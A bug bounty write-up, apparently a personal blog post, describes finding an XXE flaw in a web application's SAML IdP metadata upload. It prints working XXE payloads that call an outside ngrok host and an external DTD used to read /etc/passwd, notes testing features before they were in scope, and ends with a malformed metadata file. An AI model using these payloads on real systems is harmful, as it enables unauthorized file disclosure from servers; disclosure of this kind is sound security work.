XXE in SAML SSO Writeup - Bug Bounty

Today I am going to share how I found an XXE in SAML SSO of one web application. This was a private program on HackerOne and they were giving paid plan credentials for testing. But the scope was limited as they were restricted to only a few features. So after finishing the testing of limited features, I started looking at other features which were not in scope. There was this "Security Controls" feature that attracted me because it was allowing different types of authentications

I checked all of them and saw that SAML was accepting XML in the IdP Metadata field. I was having a feeling that here I could find something critical. So I started searching on google about this SAML IdP and came to this website where we can generate IdP metadata.



So I generated this metadata and tried it in the application. Yes, it was accepted but it was not allowing any authentication using that because the data was wrong in that IdP Metadata XML. So I tried XXE basic payloads and one payload worked. This is the basic payload for receiving responses from the target server

<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "https://app.target.com@29de5f70.ngrok.io"> %asd;]>

Then in a few weeks, this feature was in scope and I reported it with this payload in that XML as "XXE in SAML SSO". The report was triaged by HackerOne triager.

Yes I know, this was my mistake and I started arguing with him. The triager was also online at that time, so I have received answers quickly and he was telling the Facts.

Then I tried all Portswigger XXE Labs in 20 mins and found that we can exploit this case with DTD file. So I tried this Lab DTD file and I got what I needed

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]>

I was able to fetch "/etc/passwd" data using DTD in payload. Triager was also nice and this was his response

Final XML Metadata file was this:-

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata"
     <md:SPSSODescriptor AuthnRequestsSigned="false" WantAssertionsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
     <md:SingleLogoutService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect"
              Location="https://app.target.com" />
     <md:AssertionConsumerService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
               Location="https://app.target.com" index="1" />

That's all Folks!

Thank you

Jai Hind!!!

Like, Share, Comment

1,504 views0 comments